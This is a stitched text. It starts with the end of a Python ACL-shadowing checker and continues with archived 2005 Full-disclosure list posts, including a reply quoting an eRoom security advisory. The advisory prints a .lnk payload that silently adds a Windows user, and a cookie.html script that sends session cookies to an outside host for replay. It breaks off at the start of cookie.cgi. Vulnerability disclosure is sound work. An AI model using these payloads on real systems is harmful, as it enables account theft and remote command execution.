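    """List (line, covering_line, conflicting) for entries that never match."""
    rules = parse(acl)
    findings = []
    for i, (action, net) in enumerate(rules):
        for j in range(i):
            earlier_action, earlier_net = rules[j]
            if net.subnet_of(earlier_net):
                # conflicting=True means the dead entry wanted the opposite action
                findings.append((i + 1, j + 1, action != earlier_action))
                break
    return findings

if __name__ == "__main__":
    for name, acl in (("bad", BAD_ORDER), ("good", GOOD_ORDER)):
        print(name, evaluate(acl, "10.1.5.20"), shadowed(acl))
```

A conflicting finding is the case the thread warns about: a packet is thrown away by a line that sits above the one that would have permitted it.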


RE: [spam] Re: [Full-disclosure] An old/new security list

2005-08-23 Thread Exibar
Bah! FTP's not guaranteed to be replicated. I simply zip my critical
data up, encrypt it, and post it to the alt.binaries.big-boob usenet
groups. Literally let the world's server be my backup :-)

 Exibar

 -Original Message-
 From: Technica Forensis [mailto:[EMAIL PROTECTED]
 Sent: Tuesday, August 23, 2005 11:15 AM
 To: full-disclosure@lists.grok.org.uk
 Subject: [spam] Re: [Full-disclosure] An old/new security list


 On 8/22/05, Ill will [EMAIL PROTECTED] wrote:
  thinking security-minded people always backed up their hdds daily :D
 

 Real men don't do backups, they just put their work on an FTP site and
 let the world mirror it.
 --Linus Torvalds


[Full-disclosure] RE: eRoom Multiple Security Issues

2005-07-07 Thread exibar
I don't see how uploading a .LNK file to E-Room would cause the file to be
executed. Wouldn't a .LNK file be treated as an Internet Link and attempt to
be rendered in Internet Explorer? Any chance of you posting your exact .lnk
file to the list? I must be missing something in between the jigs and the
reels...

With the code you supplied for the cookie grabbing, couldn't you use that
same code for any cookie harvesting as long as you know the name of the cookie
you want to grab? Of course the trick would be to get a link to your HTML
code up on the site you wish to harvest the cookies from.

  Exibar


- Original Message -
From: c0ntex [EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk
Sent: Wednesday, July 06, 2005 3:12 PM
Subject: [Full-disclosure] eRoom Multiple Security Issues


/*


*
  $ An open security advisory #9 - eRoom v6.* Vulnerabilities


*
  1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com
  2: Bug Released: July 06 2005
  3: Bug Impact Rate: Medium / Hi
  4: Bug Scope Rate: Remote


*
  $ This advisory and/or proof of concept code must not be used for commercial gain.


*

  Documentum eRoom
  http://www.documentum.com

  Documentum eRoom enables enterprises to become more productive, efficient, and agile by bringing
  together people, processes, and content. In fact, more than 1000 Global 2000 enterprises use
  Documentum eRoom to optimize key projects and processes.

  eRoom has some vulnerabilities in that it does not deal with attached files or handle cookies in
  a secure manner. This being the case, it is possible to abuse trust between users utilising the
  system, execute code on systems of valid users and compromise user accounts by stealing/replaying
  their session cookies.

  Issues
  --

  1) Attaching malicious files
  2) Stealing and replaying cookies
     - I am unable to verify if the replay attack and cookie time out affects all versions of eRoom
       6.* as I do not have access to a default installation and am unable to find a demo version
       that I can use, though the chances are it is. I can guarantee that cookies can be stolen from
       all versions and java script / HTML can be run from within an attached file.


  1 - Attached files
  --

  eRoom allows a user to attach files into the website to share with other users, however there is
  no restriction on the type of file that can be attached. This can be abused to remotely compromise
  the systems of eRooms users.

  If an .exe file is uploaded, when the user clicks on the file the usual "what do you want to do
  with this file" box pops up and as such, this does not seem a big problem. However, this check can
  be bypassed by uploading a .lnk file (windows shortcut) to the site, which contains any command you
  wish, I used the following:

  %SystemRoot%\system32\cmd.exe /k net user hacker hackerpass /ADD

  proving it is possible to have a command run on the remote users system once the user clicks on the
  file. Notice there is no further user interaction required and no pop-up box is received, the .lnk
  just gets downloaded by the eRoom plugin in the background and gets run, adding a user account to
  the system.

  There are no warnings given to the user about the file containing a link to an executable image, and
  as such, it remains an invisible compromise.

  The downloaded file will be left in

  C:\Documents and Settings\user\Application Data\eRoom\eRoom Client\V6\Attachments\
  {blahblah-blah-blah-blah-1234567890}\0_2bcb\budget_info.lnk


  2 - Stealing and replaying cookies
  --

  Cookies used for authentication in eRoom seem to be set up in a manner that allows a simple replay
  attack to be performed. The session cookie does not expire, as such, once it has been compromised
  and harvested, anyone can then replay the cookie and gain access to the site as the original user.

  Evil user uploads an html file to eRoom, the victim browses the file cookie.html, which will send
  the users cookie information to a cgi script on a malicious web server and harvest the details.
  These cookie details can then be used in a replay attack giving the attacker the potential to gain
  access to the web site as the user who accessed cookie.html.

  /* cookie.html */
  <html>
  <head>
    <title>Raiding the cookie jar</title>
  </head>
  <body>

  <br>
    <script>document.location='https://10.1.1.2/cgi-bin/cookie.cgi?'+document.cookie</script>
  <br>

  </body>
  </html>


  /* cookie.cgi */
  #!/usr/bin/perl
  use